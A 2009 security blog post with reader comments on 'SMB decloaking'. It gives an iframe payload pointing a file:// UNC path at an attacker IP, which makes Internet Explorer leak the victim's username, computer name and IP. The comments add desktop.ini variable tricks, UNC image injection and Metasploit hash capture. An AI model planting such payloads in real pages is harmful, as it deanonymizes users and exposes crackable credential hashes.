SMB Decloaking
Still in line with the DefCon preso, next on the list of things I need to talk about is SMB. Yeah, I already talked about SMBenum, but that’s different - that is about knowing what you’ve got on your dive. SMB itself is a way for two computers to talk to one another. The simplest example is an iframe. Of course you need to have SMB running on both sides and they need to be able to communicate together for this to work. But the nice thing is if you’ve got Wireshark running you can get the real username, IP address, computer name, service pack and possibly other interesting tidbits.
<iframe src="file:///\\123.123.123.123/"></iframe>
Of course for this to work several things have to be true. One, the above IP address needs to be modified to be the attacker’s computer. Two, the attacker needs to be running SMB services to listen and get the information. Three, the company where the victim is connecting from must allow outbound SMB - which I’m told is only about 50%. So 50% of people running 60% of browsers (an IE variant) will be vulnerable to this. Still not terrible and isn’t particularly noisy either and requires no user interaction, which is nice.
August 12th, 2009 at 2:16 am
Hi, the same SMB issues can also be exploited using Windows Media Player embebbed in a web page. Used against a victim in an intranet environment it can lead the attacker to make a scan of the hosts reachable from the victim with an exact identification of hostname, domain, OS, cpu model, etc.
I posted about this topic on my blog a couple of months ago.
August 12th, 2009 at 10:15 pm
Dude, what kind of a noob are you? This stuff has been talked about for years. See e.g. http://blog.metasploit.com/2008_11_01_archive.html; http://www.xfocus.net/articles/200305/smbrelay.html. You make it sound like you just discovered this. At least give credit where it’s due.
August 13th, 2009 at 6:29 pm
tried to locate that rosario and could not, could you hit me with the link please?
on topic
Good Post - Q. any ie ? Q. how particularly NOT noisy?
thx
August 13th, 2009 at 7:26 pm
@Sir Duke - I think you mis-read my post. This isn’t about authentication tokens/NTLM challenge responses or anything like that. This is about the fact that it discloses the username and computer name in an _unauthenticated_ state. Nothing to do with passwords.
And no, I probably didn’t invent it. Seems like anything anyone says has some foundation in other people’s research. No need to be hostile.
August 13th, 2009 at 7:28 pm
@sencaw - yeah all versions of IE appear to work. It’s not noisy in the sense where there’s no popups or anything to alert the user. From a network perspective it’s very noisy, but not that many people are watching the wire during typical web surfing activities.
August 14th, 2009 at 1:03 pm
@sencaw the link is http://sites.google.com/site/tentacoloviola
August 16th, 2009 at 12:27 am
You didn’t by chance grab this from deanonymizer.com’s IE 0-day scan that launched during BlackHat and Defcon this year, did you?
Let me explain this a bit more about this.
When IE uses this FILE URI and points to a directory/share using SMB, it looks for the desktop.ini file too. Using the correct variables in the path to set the folder’s icon, an attacker can reveal the %USERNAME%, %COMPUTERNAME%, %DOMAINNAME% (or Workgroup), and the real IP address of the user *IF* they are using a shitty proxy.
Now what makes this even more interesting is the history of SMB. Besides revealing information, SMB has been prone to several vulnerabilities in the past. WebDAV, BTW, is used when SMB can’t make it outside the network for _X_ reason. If you look hard enough, you’ll find remote code execution in WebDAV. It’s already been found, but Windows 7 has fixed the issue so it’s a dying vuln.
Go ahead and take a closer look at WebDAV, but just remember where you got your info from. Some people don’t take it lightly when credit isn’t given when it’s due. Take Kaminsky, for example, who tried taking the part of spotlight of Moxie’s SSL work…and he ended up in the zf05. Something to think about….
August 17th, 2009 at 9:50 am
may as well pwn them if you are going to inject img src=\\UNC ..
http://forums.remote-exploit.org/showthread.php?t=12885
August 19th, 2009 at 9:26 am
@Bob - cool, no I hadn’t heard about the deanonymizer project. I actually first started talking about this at Blackhat, incidentally (maybe even on the same day)? Small world. But yeah, I wasn’t thinking about using it to scan, just to passively listen to the wire. I’m sure you’re right and there is a lot of other stuff out there to be found.
Which SSL work did Kaminksy steal? I didn’t make his presentation this year, and haven’t gotten the DVDs for the conference, so I haven’t seen it. I just heard something about MD2 being used….?
@opreat0r - true, my speech with Jabra was just about decloaking. I leave the actual exploitation to the MetaSploit browser auto-pwn guys. They live and breath that kind of thing. Our speech was just about anti-privacy.
October 23rd, 2009 at 9:06 am
You can use metasploit’s smb_sniffer module to log all of these requests. You also get a crackable password hash.